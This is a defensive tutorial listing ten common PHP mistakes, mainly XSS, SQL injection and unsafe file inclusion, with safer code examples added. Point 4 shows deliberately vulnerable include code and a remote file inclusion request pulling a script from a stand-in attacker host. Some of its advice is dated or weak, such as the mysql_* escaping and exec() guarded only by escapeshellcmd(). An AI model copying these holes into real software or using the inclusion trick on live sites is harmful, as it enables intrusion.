PHP programmers are increasingly being trusted with important tasks.
PHP is a great, flexible web development language, yet I keep seeing PHP programmers repeat the same mistakes. I have put together the following list of the 10 errors PHP programmers commit most often; most of them are security related. See how many of them you have made yourself:
1. Not escaping output as HTML entities
Basic common sense: all untrusted input (especially data submitted by users through forms) must be escaped before it is output.
echo $_GET['username'];
This example outputs the raw value of the parameter, exactly as the user supplied it.
That is an obvious security risk unless you can guarantee that your users only ever enter harmless values.
How to FIX:
We need to convert "<", ">", "&", "\"" and "'" to their HTML representations (&lt; &gt; &amp; &quot; &#039;); the functions htmlspecialchars() and htmlentities() do exactly that.
The right way:
echo htmlspecialchars($_GET['username'], ENT_QUOTES, 'UTF-8');
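As an added example (not code from the original post), here is the same escaping applied consistently in both text and attribute context, with a constructed value standing in for $_GET['username']; the helper name e() is my own choice.

```php
<?php
// Added example: escape every untrusted value at the point where it is
// placed into HTML, in text context and in attribute context alike.
function e(string $value): string
{
    // ENT_QUOTES also converts single quotes; the charset must match the page's.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input standing in for $_GET['username'].
$username = "O'Brien <b>bold</b> \"quoted\"";

// Unsafe: the markup inside $username becomes part of the page.
$unsafe = "<p>Hello, " . $username . "</p>";

// Safe: the same value rendered as literal text and as an attribute value.
$safe = "<p>Hello, " . e($username) . "</p>\n"
      . '<input name="username" value="' . e($username) . '">';

echo $unsafe, "\n", $safe, "\n";
// $safe contains &lt;b&gt;, &quot; and &#039; instead of raw markup,
// so the browser displays the characters rather than interpreting them.
```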
2. Not escaping SQL input
I discussed this problem in "The simplest way to prevent SQL injection (in PHP+MySQL)" and gave a simple method there. Some people told me they had set magic_quotes to On in php.ini, so they did not need to worry about it, but not all input comes from $_GET, $_POST or $_COOKIE!
How to FIX:
In "The simplest way to prevent SQL injection (in PHP+MySQL)" I recommended the mysql_real_escape_string() function.
Correct practice:
<?php
$sql = "UPDATE users SET"
     . " name='" . mysql_real_escape_string($name) . "'"
     . " WHERE id='" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
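As an added example that goes beyond the post's escaping approach (it is not the author's code): the same UPDATE with a PDO prepared statement, which keeps data and SQL separate instead of escaping quotes into the query string. The mysql_* extension used above was removed in PHP 7; the DSN, credentials and the users table are placeholders.

```php
<?php
// Added example: prepared statement instead of string escaping.
// Connection details are placeholders; the users(id, name) table is assumed.
$pdo = new PDO(
    'mysql:host=localhost;dbname=app;charset=utf8mb4',
    'dbuser',      // placeholder
    'dbpassword',  // placeholder
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]
);

function updateUserName(PDO $pdo, int $id, string $name): int
{
    // The SQL text is fixed; the values travel separately and are never
    // parsed as SQL, so quotes or keywords in $name cannot change the query.
    $stmt = $pdo->prepare('UPDATE users SET name = :name WHERE id = :id');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed inputs: the apostrophe in the name is stored literally.
$id   = (int) ($_GET['id'] ?? 0);
$name = (string) ($_GET['name'] ?? "O'Brien");
echo updateUserName($pdo, $id, $name), " row(s) updated\n";
```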
3. Incorrect use of HTTP header related functions: header(), session_start(), setcookie()
Have you encountered this warning? "Warning: Cannot modify header information - headers already sent [....]"
Each time a web page is downloaded from the server, the server's output is split into two parts: the header and the body.
The header contains non-visual data such as cookies and is always sent first. The body contains the visible HTML, images and other data.
If output_buffering is set to Off, every HTTP header related function must be called before any output is produced. The problem is that you develop in one environment and deploy to another, and the output_buffering settings may differ between them. The result is that the page breaks, and neither the cookie nor the session is set correctly.
How to FIX:
Make sure to call the HTTP header related functions before any output, and set output_buffering = Off.
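As an added illustration of that ordering (not the post's code), the following page does all of its header work in one function that fails loudly, with file and line, if output has already started; it assumes PHP 7.3 or later for the setcookie() options array, and the cookie name is hypothetical.

```php
<?php
// Added example: decide everything that belongs in the HTTP header before
// the first byte of body output, and detect a violated order immediately.
function sendHeadersOrFail(): void
{
    // headers_sent() reports where output started (a stray echo, whitespace
    // before "<?php", a BOM in an included file, ...).
    if (headers_sent($file, $line)) {
        throw new RuntimeException("Output already started at $file:$line");
    }
    session_start();
    setcookie('theme', 'dark', [          // hypothetical cookie
        'expires'  => time() + 86400,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    header('Content-Type: text/html; charset=UTF-8');
}

// Correct order: header work first, body afterwards. With output_buffering
// off in development, a wrong order shows up here rather than only on the
// production server.
sendHeadersOrFail();
echo "<!doctype html><title>ok</title>\n";
```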
4. Requiring or including files based on unsafe data
Once again: do not trust data you did not explicitly declare yourself. Do not include or require files whose names come from $_GET, $_POST or $_COOKIE.
For example:
index.php:
<?php
include($_GET['filename']);
Now any attacker can request http://www.yourdomain.com/index.php?filename=anyfile.txt to read your confidential information, or to execute a PHP script.
If allow_url_fopen=On, you are in even deeper trouble:
Try this input:
Http://www.yourdomain.com/index. ... n.com%2fphphack.php
Now your page contains the output of http://www.youaredoomed.com/phphack.php. The attacker can send spam, change passwords, delete files, and anything else they like.
How to FIX:
You must control yourself which files may be included by include or require directives.
Here is a quick, though not comprehensive, workaround:
<?php
// Include only files that are explicitly allowed.
$allowedFiles = array('file1.txt', 'file2.txt', 'file3.txt');
if (in_array((string) $_GET['filename'], $allowedFiles, true)) {
    include($_GET['filename']);
} else {
    exit('not allowed');
}
?>
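As an added example (not the post's code) that generalises the allowlist above: the request parameter is only ever a key into a fixed map, and the resolved path is additionally checked to lie inside the pages directory. The directory name and page files are hypothetical.

```php
<?php
// Added example: map a request key to a file and confirm the resolved path
// stays inside the pages directory. Paths and page names are hypothetical.
$pagesDir = realpath(__DIR__ . '/pages');
if ($pagesDir === false) {
    exit('pages directory missing');
}
$pages = [                       // request key => file name (fixed list)
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(string $key, array $pages, string $pagesDir): ?string
{
    if (!isset($pages[$key])) {
        return null;             // unknown key: never touch the filesystem
    }
    $path = realpath($pagesDir . '/' . $pages[$key]);
    // realpath() returns false for missing files and collapses "..", so a
    // false result or a path outside $pagesDir means the page is unusable.
    $prefix = $pagesDir . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$key  = (string) ($_GET['page'] ?? 'home');
$file = resolvePage($key, $pages, $pagesDir);
if ($file === null) {
    http_response_code(404);
    exit('Not found');
}
include $file;
```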
5. Syntax errors
Syntax errors cover all lexical and grammatical mistakes, and they are so common that I have to list them here. The solution is to learn PHP syntax properly and take care not to miss a parenthesis, curly brace, semicolon or quotation mark. A good editor helps too; do not use Notepad!
6. Rarely or never using object orientation
Many projects do not use PHP's object-oriented features, and as a result their code is very time consuming to maintain. PHP supports a growing range of object-oriented techniques and keeps getting better at them, so there is no reason not to use them.
7. Not using a framework
95% of PHP projects do the same four things: create, edit, list and delete. There are now plenty of MVC frameworks that help us do these four things, so why not use them?
8. Not knowing what functionality PHP already provides
PHP's core contains a great many features, yet many programmers keep reinventing the wheel and waste a lot of time. Before you write code, search the PHP manual and Google; you may well discover something new! For example, exec() in PHP is a powerful function that runs a shell command and returns the last line of its output as a string. For safety, use escapeshellcmd() with it.
9. Using older versions of PHP
Many programmers are still using PHP4. Developing on PHP4 cannot exploit PHP's full potential, and it carries some security risks. Moving to PHP5 does not cost much: most PHP4 programs can be migrated to PHP5 with few or no changes. According to a survey by http://www.nexen.net,
only 12% of PHP servers run PHP5, so 88% of PHP developers are still using PHP4.
10. Double-escaped quotation marks
Have you ever seen \' or \\' appear on a web page? This usually happens because magic_quotes is set to Off in the developer's environment and On on the deployment server, so PHP runs addslashes() on the GET, POST and cookie data a second time.
Original text:
It's a string
Magic quotes on:
It\'s a string
Run addslashes() once more:
It\\\'s a string
HTML output:
Another situation: the user first enters incorrect login details, the server detects the bad input and outputs the same form asking the user to enter them again, and the user's input ends up escaped twice!
I hope the 10 points introduced above are of some help to you.
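As an added example (not the post's code), the following reproduces the double escaping described in point 10 and normalises request data so the application always works with the raw value, whichever way magic_quotes_gpc is set. It only matters on PHP older than 5.4, where the setting still existed; get_magic_quotes_gpc() was removed in PHP 8, hence the function_exists() guard.

```php
<?php
// Added example: undo magic_quotes_gpc on arrival and escape exactly once,
// at the point of use, so a value is never slashed twice.
function stripMagicQuotes(array $data): array
{
    // Walk nested arrays such as $_POST['user']['name'] as well.
    foreach ($data as $key => $value) {
        $data[$key] = is_array($value)
            ? stripMagicQuotes($value)
            : stripslashes($value);
    }
    return $data;
}

// Constructed sample: what a server with magic_quotes_gpc = On hands to the script.
$raw          = "It's a string";
$fromGpc      = addslashes($raw);       // It\'s a string   (done by PHP automatically)
$escapedTwice = addslashes($fromGpc);   // It\\\'s a string (the mistake from point 10)

$request = ['name' => $fromGpc];
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    $request = stripMagicQuotes($request);   // back to: It's a string
}

// Now $request['name'] holds the raw value; escape it once where it is used
// (SQL escaping, htmlspecialchars() for HTML), never on arrival.
echo $escapedTwice, "\n", $request['name'], "\n";
```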